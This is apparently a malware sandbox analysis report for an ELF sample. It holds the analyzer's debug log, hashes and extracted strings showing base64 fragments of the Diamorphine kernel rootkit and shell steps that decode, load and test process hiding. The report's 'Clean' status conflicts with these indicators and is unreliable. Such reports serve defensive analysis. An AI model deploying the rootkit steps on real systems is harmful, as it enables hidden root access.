Analysis Report · ACUBE Sandbox

Status: Clean

Analysis

Category	Package	Started	Completed	Duration	Options	Log(s)	MalScore
FILE		2025-12-08 13:55:52	2025-12-08 13:59:58	246 seconds	Show Options	Show Analysis Log	3.5

vnc_port=5901

2025-12-08 05:51:54,001 [root] DEBUG: Starting analyzer from: /tmp7_5yn7x6
2025-12-08 05:51:54,002 [root] DEBUG: Storing results at: /tmp/eNwbVgsgtA
2025-12-08 05:51:54,003 [root] DEBUG: Importing auxiliary module "modules.auxiliary.auditd"...
2025-12-08 05:51:54,004 [root] DEBUG: Importing auxiliary module "modules.auxiliary.filecollector"...
2025-12-08 05:51:54,007 [root] DEBUG: Importing auxiliary module "modules.auxiliary.human"...
2025-12-08 05:51:54,008 [root] DEBUG: Importing auxiliary module "modules.auxiliary.screenshots"...
2025-12-08 05:51:54,015 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2025-12-08 05:51:54,018 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2025-12-08 05:51:54,035 [root] DEBUG: Importing auxiliary module "modules.auxiliary.sysmon"...
2025-12-08 05:51:54,036 [root] DEBUG: Importing auxiliary module "modules.auxiliary.tracee"...
2025-12-08 05:51:54,037 [root] DEBUG: Initialized auxiliary module "Auditd"
2025-12-08 05:51:54,037 [root] DEBUG: Trying to start auxiliary module "Auditd"...
2025-12-08 05:51:54,037 [root] DEBUG: Started auxiliary module "Auditd"
2025-12-08 05:51:54,038 [modules.auxiliary.filecollector] INFO: FileCollector run started
2025-12-08 05:51:54,041 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir sbin
2025-12-08 05:51:54,041 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir srv
2025-12-08 05:51:54,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir media
2025-12-08 05:51:54,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir libx32
2025-12-08 05:51:54,042 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp7_5yn7x6
2025-12-08 05:51:54,043 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir etc
2025-12-08 05:51:54,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir mnt
2025-12-08 05:51:54,078 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmpij155kl0
2025-12-08 05:51:54,079 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir boot
2025-12-08 05:51:54,081 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir cdrom
2025-12-08 05:51:54,081 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir bin
2025-12-08 05:51:54,082 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir root
2025-12-08 05:51:54,084 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir opt
2025-12-08 05:51:54,084 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir snap
2025-12-08 05:51:54,655 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir tmp
2025-12-08 05:51:54,656 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir home
2025-12-08 05:51:54,669 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lost+found
2025-12-08 05:51:54,669 [modules.auxiliary.filecollector] INFO: FileCollector trying to watch dir lib32
2025-12-08 05:51:54,669 [modules.auxiliary.filecollector] INFO: FileCollector setup complete
2025-12-08 05:51:55,038 [root] DEBUG: Initialized auxiliary module "FileCollector"
2025-12-08 05:51:55,038 [root] DEBUG: Trying to start auxiliary module "FileCollector"...
2025-12-08 05:51:55,038 [root] DEBUG: Started auxiliary module "FileCollector"
2025-12-08 05:51:55,038 [modules.auxiliary.human] DEBUG: Human init complete
2025-12-08 05:51:55,038 [root] DEBUG: Initialized auxiliary module "Human"
2025-12-08 05:51:55,039 [root] DEBUG: Trying to start auxiliary module "Human"...
2025-12-08 05:51:55,039 [root] DEBUG: Started auxiliary module "Human"
2025-12-08 05:51:55,039 [root] DEBUG: Initialized auxiliary module "Screenshots"
2025-12-08 05:51:55,039 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2025-12-08 05:51:55,039 [root] DEBUG: Started auxiliary module "Screenshots"
2025-12-08 05:51:55,039 [root] DEBUG: Initialized auxiliary module "Sysmon"
2025-12-08 05:51:55,039 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2025-12-08 05:51:55,052 [root] DEBUG: Started auxiliary module "Sysmon"
2025-12-08 05:51:55,052 [modules.auxiliary.tracee] INFO: docker start
2025-12-08 05:51:55,052 [root] DEBUG: Initialized auxiliary module "Docker"
2025-12-08 05:51:55,052 [root] DEBUG: Trying to start auxiliary module "Docker"...
2025-12-08 05:51:55,079 [modules.auxiliary.tracee] DEBUG: Starting docker container
2025-12-08 05:51:55,091 [modules.auxiliary.tracee] DEBUG: Attempt to remove Tracee container if it exists.
2025-12-08 05:51:55,091 [modules.auxiliary.tracee] DEBUG: sudo docker run --name tracee -d --pid=host --cgroupns=host --privileged -v /etc/os-release:/etc/os-release-host:ro -v /tmp7_5yn7x6/tracee-artifacts/:/tmp/tracee/out/host -v /var/run:/var/run:ro -v /tmp7_5yn7x6/modules/auxiliary/tracee:/policy aquasec/tracee:latest --output json --output option:parse-arguments,exec-env,exec-hash --policy /policy/policy.yml --cache cache-type=mem --cache mem-cache-size=1024 --capture bpf --capture module --capture write --signatures-dir=/policy/signatures --signatures-dir=./signatures
2025-12-08 05:51:55,317 [modules.auxiliary.tracee] DEBUG: Docker container started: b28f4776bc6b1056293688ce9296767adf7d2e3f59c2007e58b451931bd722ba

2025-12-08 05:51:55,319 [lib.common.results] INFO: File /bin/sh-shim size is 125688, Max size: 100000000
2025-12-08 05:52:05,334 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33363 size is 34, Max size: 100000000
2025-12-08 05:52:05,351 [modules.auxiliary.tracee] INFO: Try to stream
2025-12-08 05:52:05,352 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d520ee0>
2025-12-08 05:52:05,353 [modules.auxiliary.tracee] INFO: Streamstart
2025-12-08 05:52:05,353 [root] DEBUG: Started auxiliary module "Docker"
2025-12-08 05:52:05,355 [lib.core.packages] INFO: sh -c
2025-12-08 05:52:05,356 [lib.core.packages] INFO: Process will start with strace + sh-shim for Tracee's scope
2025-12-08 05:52:05,356 [lib.core.packages] INFO: sudo strace -v -o /dev/stderr -s 800  -ttf /bin/sh-shim -c "sh -c /tmp/file"
2025-12-08 05:52:05,357 [lib.core.packages] INFO: Process started
2025-12-08 05:52:05,357 [root] INFO: Added new process to list with pid: 2173
2025-12-08 05:52:05,358 [root] INFO: New child process detected: 2175
2025-12-08 05:52:05,359 [root] ERROR: Could not read memory range 7f0538974000-7f0538982000: [Errno 5] Input/output error
2025-12-08 05:52:05,360 [root] ERROR: Could not read memory range 7ffe0ce98000-7ffe0ce9c000: [Errno 5] Input/output error
2025-12-08 05:52:05,360 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2175.dmp size is 958464, Max size: 100000000
2025-12-08 05:52:05,365 [root] INFO: Added new process to list with pid: 2175
2025-12-08 05:52:05,538 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine.ko size is 0, Max size: 100000000
2025-12-08 05:52:05,543 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-26411 size is 16061, Max size: 100000000
2025-12-08 05:52:05,563 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine.ko size is 4096, Max size: 100000000
2025-12-08 05:52:05,565 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine.ko size is 8192, Max size: 100000000
2025-12-08 05:52:05,567 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-8388611.inode-2490508 size is 11888, Max size: 100000000
2025-12-08 05:52:05,611 [lib.common.results] INFO: File /tmp7_5yn7x6/tracee-artifacts/write.dev-14.inode-33385 size is 77, Max size: 100000000
2025-12-08 05:52:05,617 [root] INFO: New child process detected: 2176
2025-12-08 05:52:05,665 [root] ERROR: Could not read memory range 7fff967a9000-7fff967ad000: [Errno 5] Input/output error
2025-12-08 05:52:05,666 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2176.dmp size is 19468288, Max size: 100000000
2025-12-08 05:52:05,747 [root] INFO: Added new process to list with pid: 2176
2025-12-08 05:52:05,747 [root] INFO: New child process detected: 2179
2025-12-08 05:52:05,750 [root] ERROR: Could not read memory range 7ffd105f0000-7ffd105f4000: [Errno 5] Input/output error
2025-12-08 05:52:05,750 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2179.dmp size is 2523136, Max size: 100000000
2025-12-08 05:52:05,762 [root] INFO: Added new process to list with pid: 2179
2025-12-08 05:52:05,763 [root] INFO: New child process detected: 2180
2025-12-08 05:52:05,765 [root] ERROR: Could not read memory range 7ffc2d5f4000-7ffc2d5f8000: [Errno 5] Input/output error
2025-12-08 05:52:05,765 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2180.dmp size is 2523136, Max size: 100000000
2025-12-08 05:52:05,778 [root] INFO: Added new process to list with pid: 2180
2025-12-08 05:52:05,778 [root] INFO: New child process detected: 2181
2025-12-08 05:52:05,780 [root] ERROR: Could not read memory range 7ffcfc93f000-7ffcfc943000: [Errno 5] Input/output error
2025-12-08 05:52:05,781 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2181.dmp size is 2433024, Max size: 100000000
2025-12-08 05:52:05,793 [root] INFO: Added new process to list with pid: 2181
2025-12-08 05:52:05,793 [root] INFO: New child process detected: 2182
2025-12-08 05:52:05,795 [root] ERROR: Could not read memory range 7ffd4d52d000-7ffd4d531000: [Errno 5] Input/output error
2025-12-08 05:52:05,795 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2182.dmp size is 2539520, Max size: 100000000
2025-12-08 05:52:05,808 [root] INFO: Added new process to list with pid: 2182
2025-12-08 05:52:05,808 [root] INFO: New child process detected: 2183
2025-12-08 05:52:05,835 [root] ERROR: Could not read memory range 7ffd26529000-7ffd2652d000: [Errno 5] Input/output error
2025-12-08 05:52:05,835 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2183.dmp size is 17481728, Max size: 100000000
2025-12-08 05:52:05,909 [root] INFO: Added new process to list with pid: 2183
2025-12-08 05:52:06,160 [root] INFO: New child process detected: 2187
2025-12-08 05:52:06,178 [root] ERROR: Could not read memory range 7ffd2c7dd000-7ffd2c7e1000: [Errno 5] Input/output error
2025-12-08 05:52:06,178 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2187.dmp size is 17014784, Max size: 100000000
2025-12-08 05:52:06,251 [root] INFO: Added new process to list with pid: 2187
2025-12-08 05:52:08,356 [modules.auxiliary.tracee] INFO: <lib.common.results.NetlogFile object at 0x7fbe3d520ee0>
2025-12-08 05:52:08,385 [modules.auxiliary.tracee] INFO: CONTAINER ID   IMAGE                   COMMAND                  CREATED          STATUS          PORTS     NAMES
b28f4776bc6b   aquasec/tracee:latest   "/tracee/entrypoint.…"   13 seconds ago   Up 13 seconds             tracee

2025-12-08 05:52:08,407 [modules.auxiliary.tracee] INFO: sudo tail +1f /var/lib/docker/containers/b28f4776bc6b1056293688ce9296767adf7d2e3f59c2007e58b451931bd722ba/b28f4776bc6b1056293688ce9296767adf7d2e3f59c2007e58b451931bd722ba-json.log
2025-12-08 05:52:08,763 [root] INFO: New child process detected: 2208
2025-12-08 05:52:08,778 [root] ERROR: Could not read memory range 7ffecb56e000-7ffecb572000: [Errno 5] Input/output error
2025-12-08 05:52:08,780 [lib.common.results] INFO: File /tmp/eNwbVgsgtA/memory/2208.dmp size is 4304896, Max size: 100000000
2025-12-08 05:52:08,810 [root] INFO: Added new process to list with pid: 2208
2025-12-08 05:52:08,954 [lib.common.results] INFO: File /tmp7_5yn7x6/diamorphine-invisible.txt size is 3443, Max size: 100000000

Machine

Name	Label	Manager	Started On	Shutdown On
ubuntu22.04-64bit-1	ubuntu22.04-64bit-1	KVM	2025-12-08 13:55:52	2025-12-08 13:59:58

File Details

File Name	file
File Type	ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=93ec5a89bd51e49699d8943e8f18e1a98953e793, for GNU/Linux 3.2.0, not stripped
File Size	33288 bytes
MD5	ca881b8404292613c9c07a3cdcbd8d0d
SHA1	2972c0d4d86b797970050944fa23d444c6bc35c7
SHA256	f7ce60e49214f3d587e9ed26a1d3a9814552a9e00048f8c538d2cb91a46c1281 [VT] [MWDB] [Bazaar]
SHA3-384	d51278a94f8cbdaa967255f12680948b424f3494bcda85c204bf862d29a02ec646ead53157c937e155f88238e3bb413d
CRC32	09450E13
TLSH	T19BE2517741D5FEEACF281934804633308DBDBE474774C35ABB8438A927E72909E189B9
Ssdeep	384:f1EhUMkc0/QAJsDVX43eVUH7XAV6OcLyNDjRSqF9km:GhUMkc0oACDRO7XA9xjwKKm
	File Strings BinGraph Vba2Graph

__init_array_end

.rodata

AAAAADHAw2ZmLg8fhAAAAAAAZpDoAAAAAEiLBQAAAABVSIsQSInlSMdCCAAAAABIiQUAAAAASIkV

.gnu.hash

AAAAADHSSIkFAAAAAGaJFQAAAABIxwAAAAAAMcDDi09wSMfCAAAAAOsIO4gAAQAAdCZIi4LIBwAA

/3QLVUiJ5eiO+///XcMxwMNmDx+EAAAAAADoAAAAAFVIieXoAAAAAEiFwHQoSMdACAAAAABIicdI

.symtab

.dynsym

.plt.sec

B+AAAAAAa2FsbHN5bXNfbG9va3VwX25hbWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ZWxhLnBhcmFpbnN0cnVjdGlvbnMALm1vZGluZm8AX192ZXJzaW9ucwAuZGF0YQAucmVsYV9fYnVn

.comment

AAAAAAAAAAAAAAD8AgAAAAAAAAQAAAA9AAAA/P////////+FAwAAAAAAAAQAAAAqAAAA/P//////

pclose

__do_global_dtors_aux

.fini_array

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGlhbW9ycGhpbmVfc2VjcmV0AGlu

__TMC_END__

[]A\A]A^A_

AAAAAK3eSIkFAAAAAEiDwCJIiQUAAAAA6AAAAABIixUAAAAASMcFAAAAAAAAAABIi4JwAgAASIkF

CEiJ5UiJEF1IuAABAAAAAK3eSIkFAAAAAEiDwCJIiQUAAAAAuAEAAABmiQUAAAAAw+gAAAAAVUjH

.data

AAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAC4AAAAHAAAAAgAAAAAAAAAAAAAAAAAAAGQAAAAA

Failed to run script

lsmod > diamorphine-visible.txt

AAAAAAAAAAAAAAAAugx6AwAAAABrZnJlZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAIADAAAAAAAA7AEAABAAAAAAAAAAAAAAAAAAAAAAAAAA9AEAABIABwAAAAAAAAAAAHUAAAAA

echo 'Hide process'

bV91c2VyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIn9uIAAAAAF9f

ABAAAAAAAAAAAAAAAAAAAAAAAAAAxAIAABIAAwAABAAAAAAAABcAAAAAAAAA2QIAABIAAwCABAAA

AAAAAAAAAAAAAAAAAAAAAAAAALPUSrQAAAAAX2NvcHlfdG9fdXNlcgAAAAAAAAAAAAAAAAAAAAAA

BQEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=

wMNVSInlSIPsEGVIiwQlKAAAAEiJRfgxwEiLBQAAAABIicJIgeL///7/DyLCSIsVAAAAAEiLDQAA

AAAABAAAAEAAAAAAAAAAAAAAAAAAAAAoIgAAAAAAAEACAAAAAAAAGAAAAAUAAAAIAAAAAAAAABgA

__frame_dummy_init_array_entry

_GLOBAL_OFFSET_TABLE_

SInl6wg5uAABAAB0GUmLgMgHAABMjYA4+P//SD0AAAAAdeJFMcBMicBdww8fhAAAAAAA6AAAAACF

.rela.dyn

cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALm5vdGUuTGludXgALnJlbGEudGV4dAAucmVsYS5pbml0

popen@@GLIBC_2.2.5

bGVfYmYAZ2l2ZV9yb290AGNvbW1pdF9jcmVkcwBmaW5kX3Rhc2sAaXNfaW52aXNpYmxlAG1vZHVs

AAMABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAMACQAAAAAA

wHQ/D7dDEEk53g+EpwAAAGZBAUUQD7dDEElj3EkBx0w5+3Y0S40cPkiNexJmRYXSdaZIuGRpYW1v

AAAAAAAAACMAAAAAAAAALAAAAAEADgBdAAAAAAAAAAkAAAAAAAAAQgAAAAEADwAAAAAAAAAAAEAE

AAAAAwAAAAAAAAD/BAAAAAAAAAIAAAAOAAAADAAAAAAAAAAKBQAAAAAAAAsAAAAsAAAACAAAAAAA

:*3$"

AAAAycMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Y2x1ZGUvbGludXgvdGhyZWFkX2luZm8uaABzeXNfY2FsbF90YWJsZQAAAAAAAAAAAAAAAAAAAAAG

AAAAAAAAAAAAPQIAABAAAAAAAAAAAAAAAAAAAAAAAAAATgIAABAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAHAAAAAAAAABRAAAAAAAAAAIAAAAOAAAAFAAAAAAAAABvAAAAAAAAAAQAAAA0AAAA/P//////

.eh_frame_hdr

czY0AG9yaWdfa2lsbABtb2R1bGVfaGlkZGVuAG1vZHVsZV9wcmV2aW91cwBkaWFtb3JwaGluZV9p

f0VMRgIBAQAAAAAAAAAAAAEAPgABAAAAAAAAAAAAAAAAAAAAAAAAALAnAAAAAAAAAAAAAEAAAAAA

AEAAGwAaAAQAAAAUAAAAAwAAAEdOVQDgCCO8fN//LdpFXFIWTcCL2ijxDQYAAAABAAAAAAEAAExp

AAAAAAAeAQAAAAAAAAQAAAA0AAAA/P////////8aAAAAAAAAAAIAAAAvAAAA/P////////8uAAAA

AAAAAAAAAAAAAAAAAAAAACYAAAAAAAAYAAAAAAAAABgAAAAMAAAACAAAAAAAAAAYAAAAAAAAAJ0A

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKQvN3gAAAABfX3N0YWNrX2Noa19mYWlsAAAAAAAA

MjAuMDQuMikgOS40LjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQAAAAAAAAAAAAAA

AAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAC3AAAABAAAAEAAAAAAAAAAAAAAAAAAAAAYJgAAAAAA

__FRAME_END__

_IO_stdin_used

AACDAAAAAAAAAAIAAAAsAAAABAAAAAAAAACOAAAAAAAAAAIAAAAsAAAADAAAAAAAAACTAAAAAAAA

X2tpbGwAX2NvcHlfdG9fdXNlcgBwdl9vcHMAc2ltcGxlX3N0cnRvdWwAZ2V0X3N5c2NhbGxfdGFi

/P/////////fAAAAAAAAAAsAAAA5AAAAAAAAAAAAAAAsAQAAAAAAAAQAAAA9AAAA/P////////+1

AAAHAAAALwAAAAAAAAAkAAAAAAAAAAQAAAA3AAAA/P////////8vAAAAAAAAAAIAAAAOAAAALAAA

__libc_csu_fini

.eh_frame

_ITM_registerTMCloneTable

AAAAAAIAAAAvAAAA/P////////9UAAAAAAAAAAIAAAAOAAAAAgAAAAAAAABdAAAAAAAAAAIAAAAs

.plt.got

i33QSInaTIn26AAAAABMiffoAAAAAEiJ2EiDxBBbQVxBXUFeQV9dw0i4aW5lX3NlY3JIOUcIdZhm

cmlwdGlvbjExNgBfX1VOSVFVRV9JRF9hdXRob3IxMTUAX19VTklRVUVfSURfbGljZW5zZTExNAAu

//8AAAAAAAAAAAEAAAADAAAAAAAAAAAAAAAIAAAAAAAAAAEAAAADAAAAYAAAAAAAAAAQAAAAAAAA

__do_global_dtors_aux_fini_array_entry

AAAADAAAAAAAAABrAAAAAAAAAAIAAAAsAAAAbAIAAAAAAAByAAAAAAAAAAIAAAAOAAAADAAAAAAA

AAADAAAAEAYAAAAAAABQAAAAAAAAAAEAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAEAAAAPAAA

.note.gnu.build-id

//////+3BAAAAAAAAAQAAABAAAAA/P/////////BBAAAAAAAAAQAAAAxAAAA/P/////////jBAAA

AQAAAAAAAAQAAAAqAAAA/P/////////EAQAAAAAAAAQAAAA7AAAA/P/////////MAQAAAAAAAAQA

AAAAAAA/AAAAAAAAAAsAAAA8AAAAMAAAAAAAAABGAAAAAAAAAAIAAAAsAAAABAAAAAAAAABNAAAA

AAAAAAAAAAIAAAAOAAAAFAAAAAAAAADWAAAAAAAAAAIAAAAvAAAA/P/////////uAAAAAAAAAAsA

.note.ABI-tag

AAABAAAAAgAAAAAAAAAAAAAAAAAAACQJAAAAAAAAugAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAA

pki4ZGlhbW9ycGhIOUMTdFhJid3rzkiYSIPEEFtBXEFdQV5BX13DSIH7////f3d7ugEAAABIid5M

cat << 'EOF' | base64 --decode > diamorphine.ko

cmVkcwBrYWxsc3ltc19sb29rdXBfbmFtZQBtb2R1bGVfaGlkZQBjdXJyZW50X3Rhc2sAaGFja2Vk

cat << 'EOF' > suspicious.sh

.init

a2VkX2dldGRlbnRzAG9yaWdfZ2V0ZGVudHMAaGFja2VkX2dldGRlbnRzNjQAb3JpZ19nZXRkZW50

AAQAAAAtAAAA/P////////8BBAAAAAAAAAQAAAAxAAAA/P////////8JBAAAAAAAAAsAAAAHAAAA

__bss_start

MdLB6BRBD5TCRTHtRTH/60wx9roKAAAARIlVzOgAAAAARItVzIXAdFKJx0SJVczovf7//0SLVcyF

AAAAAAAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAYEgAAAAAAAHgGAAAAAAAAGQAAACoA

__cxa_finalize@@GLIBC_2.2.5

echo 'Diamorphine un-hidden'

.gnu.version_r

cmVkcwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABerfOgAAAABw

if/orP///0mJxkyJ+E2F9g+E3gAAADHSTIn+TIn3SWPc6AAAAABIi3XQTIn6TIn36AAAAACFwA+F

AAAAAD0AAAAAAAAA4wIAABAAAAAAAAAAAAAAAAAAAAAAAAAA8AIAABIAAwAgBAAAAAAAADgAAAAA

AAAAAAIAAAAOAAAADAAAAAAAAADnBQAAAAAAAAsAAAAsAAAACAAAAAAAAADuBQAAAAAAAAIAAAAs

AAAAAAAAAAAAAAAAAADAEQAAAAAAADgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA7AAA

.gnu.version

__stack_chk_fail@@GLIBC_2.4

BgAAAAAAAAAAAAAAAAAAAN8GAAAAAAAAJwEAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABF

BgAAAAAAAE8AAAAAAAAAhwIAABAAAAAAAAAAAAAAAAAAAAAAAAAAlAIAABIAAwDABAAAAAAAAAMB

7gAAAGVIiwQlAAAAAEiLgMgKAABNY+1FMdJIi0AgSItACEqLBOhIi0AYSItAMEiDeEABdQ2LQExF

AAARBQAAAAAAAAIAAAAsAAAABAAAAAAAAAAaBQAAAAAAAAIAAAAsAAAADAAAAAAAAAAhBQAAAAAA

.text

__data_start

.dynstr

.interp

DwvroA8fhAAAAAAA6AAAAABVSMfHAAAAAEiJ5egAAAAAXcNmDx+EAAAAAADoAAAAAFVJx8AAAAAA

__init_array_start

.shstrtab

completed.8061

B/8BZGVzY3JpcHRpb249TEtNIHJvb3RraXQAYXV0aG9yPW0wbmFkAGxpY2Vuc2U9RHVhbCBCU0Qv

AAQAAAAzAAAA/P////////+/AAAAAAAAAAQAAAAqAAAA/P/////////OAAAAAAAAAAQAAAArAAAA

AABIiYpwAgAASIsNAAAAAEiJisgGAABIiw0AAAAASImK8AEAAA8iwEiLRfhlSDMEJSgAAAB0BegA

bash -c '%s'

pclose@@GLIBC_2.2.5

AAAAAAAAAAAAAAAAsQAAAAEAAAADAAAAAAAAAAAAAAAAAAAAIA4AAAAAAAAAAAAAAAAAAAAAAAAA

ckg5Rwh1mGaBfxBldHWQ6Uz///8Pt9BJjTQGTIn3RIlVzEEp1Elj3EiJ2ugAAAAARItVzOlD////

SI2QOPj//0g9AAAAAHXiuP3///9dw+gAAAAAMcBdw0iF0nTrgbBc+P//AAAAEDHAXcNIiwUAAAAA

AAAAAAIAAAAOAAAALAAAAAAAAAA1AAAAAAAAAAIAAAAOAAAAJAAAAAAAAABDAAAAAAAAAAIAAAAO

Nl9pbmRpcmVjdF90aHVua19yYXgAX19zdGFja19jaGtfZmFpbABpbml0X3Rhc2sAcHJlcGFyZV9j

AAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAAAAAAAAAAAAAAAAAAAAA

DAAAAAAAAABDBgAAAAAAAAIAAAAsAAAABAAAAAAAAABOBgAAAAAAAAIAAAAsAAAADAAAAAAAAABa

BgAAAAAAAAIAAAAOAAAABAAAAAAAAAABAAAAAAAAAAQAAAAxAAAA/P////////8JAAAAAAAAAAsA

Y2hlY2tfb2JqZWN0X3NpemUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXMmi

AAAAAAAAAAAAAAAAAAAAAAMACwAAAAAAAAAAAAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK0/L8AAAAAGNvbW1pdF9j

BQAAAAAAAAIAAAAsAAAADAAAAAAAAACGBQAAAAAAAAIAAAAsAAAABAAAAAAAAACNBQAAAAAAAAIA

AAAAAAIAAAAOAAAAFAAAAAAAAADoBAAAAAAAAAQAAAAzAAAA/P/////////xBAAAAAAAAAIAAAAO

snprintf@@GLIBC_2.2.5

__libc_csu_init

AAAAAAAAAAAAAAAwAwAAAAAAAAEAAAAuAAAAAAAAAAAAAAAALnN5bXRhYgAuc3RydGFiAC5zaHN0

AAAAAAAAAAAYCQAAAAAAAAwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAhgAAAAQAAABA

AAAAAQAAAAAAAAAAAAAAAAAAALwAAAABAAAAAwAAAAAAAAAAAAAAAAAAACAOAAAAAAAAGAAAAAAA

.rela.plt

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGlhbW9ycGhpbmUAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

sh ./suspicious.sh &

AAAAAAAAAHgmAAAAAAAAMAAAAAAAAAAYAAAAEwAAAAgAAAAAAAAAGAAAAAAAAADnAAAACAAAAAMA

deregister_tm_clones

_DYNAMIC

__stack_chk_fail

AAAAAAAAAAAAAAAqAAAAAAAAAAsAAAA1AAAAyAcAAAAAAABaAAAAAAAAAAQAAABEAAAA/P//////

AABIixUAAAAASIkFAAAAAGbHBQAAAAABAEiLBQAAAABIiUIISIkQSIs9AAAAAEiJBQAAAABIuAAB

AAAAAwIAABEAFQAAAAAAAAAAAAgAAAAAAAAABwIAABAAAAAAAAAAAAAAAAAAAAAAAAAADQIAABAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAIAAAAOAAAABAAAAAAAAAAoBQAAAAAAAAsAAAAsAAAACAAAAAAAAAA1BQAAAAAAAAsAAAA1AAAA

AAAAAAC8BQAAAAAAAAIAAAAOAAAABAAAAAAAAADRBQAAAAAAAAQAAAAxAAAA/P/////////YBQAA

PVkAbmFtZT1kaWFtb3JwaGluZQB2ZXJtYWdpYz01LjQuMC0xODItZ2VuZXJpYyBTTVAgbW9kX3Vu

AAAAGAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA/AAAAAQAAAAYAAAAAAAAAAAAAAAAA

sleep 3

GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj0LjYAAAAAX2NvcHlfZnJv

AAAAAAAAAAEAAAADAAAAwAQAAAAAAABAAAAAAAAAAAEAAAADAAAA0AUAAAAAAABIAAAAAAAAAAEA

TEMxAF9fY2hlY2tfb2JqZWN0X3NpemUAX2NvcHlfZnJvbV91c2VyAF9fdGhpc19tb2R1bGUAbWVt

AAEAAAADAAAAMAIAAAAAAAAYAAAAAAAAAAEAAAADAAAAAAQAAAAAAAAgAAAAAAAAAAEAAAADAAAA

BwAAAAgAAAAAAAAAGAAAAAAAAABqAAAAAQAAAAIAAAAAAAAAAAAAAAAAAAB7CAAAAAAAAFgAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApAwAgAAAAAHNpbXBsZV9zdHJ0b3VsAAAAAAAAAAAA

ABAAAAAAAAAAAAAAAAAAAAAAAAAAzgEAABAAAAAAAAAAAAAAAAAAAAAAAAAA3gEAABEAEwAAAAAA

chmod +x suspicious.sh

echo $(ps -aux | grep suspicious.sh) > unhidden.txt

NC4wLTF1YnVudHUxfjIwLjA0LjIpIDkuNC4wAABHQ0M6IChVYnVudHUgOS40LjAtMXVidW50dTF+

